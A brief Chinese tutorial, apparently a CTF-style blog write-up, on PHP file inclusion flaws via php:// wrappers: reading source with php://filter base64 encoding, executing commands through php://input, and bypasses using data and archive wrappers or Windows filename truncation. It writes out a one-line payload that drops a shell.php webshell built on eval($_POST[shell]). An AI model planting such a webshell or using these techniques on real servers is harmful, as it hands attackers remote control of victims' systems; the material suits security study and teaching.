文件包含漏洞---php协议 (3)

  

文件包含漏洞---php协议

  这里convert.base64-encode是将源码以base64编码,然后读取出来,我解码之后得到

  

文件包含漏洞---php协议

  这里就能发现flag

  #2 命令执行获取webshell

  如果通过php://input实验发现存在漏洞,可以使用system命令dir查看目录,发现敏感的目录

  然后就可以通过<?php fputs ( fopen(\'shell.php\',\'w\') , \'<?php eval($_POST[shell])?>\') ;?>,写入一句话

  #3

  我们也可以用压缩协议,data协议进行绕过,也可以利用windows的特性,文件名字大于256时后面的内容就会舍弃,来进行绕过。

  php协议很常用很强大,这里只是我的一些浅见。

文件包含漏洞---php协议

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zgwjgs.html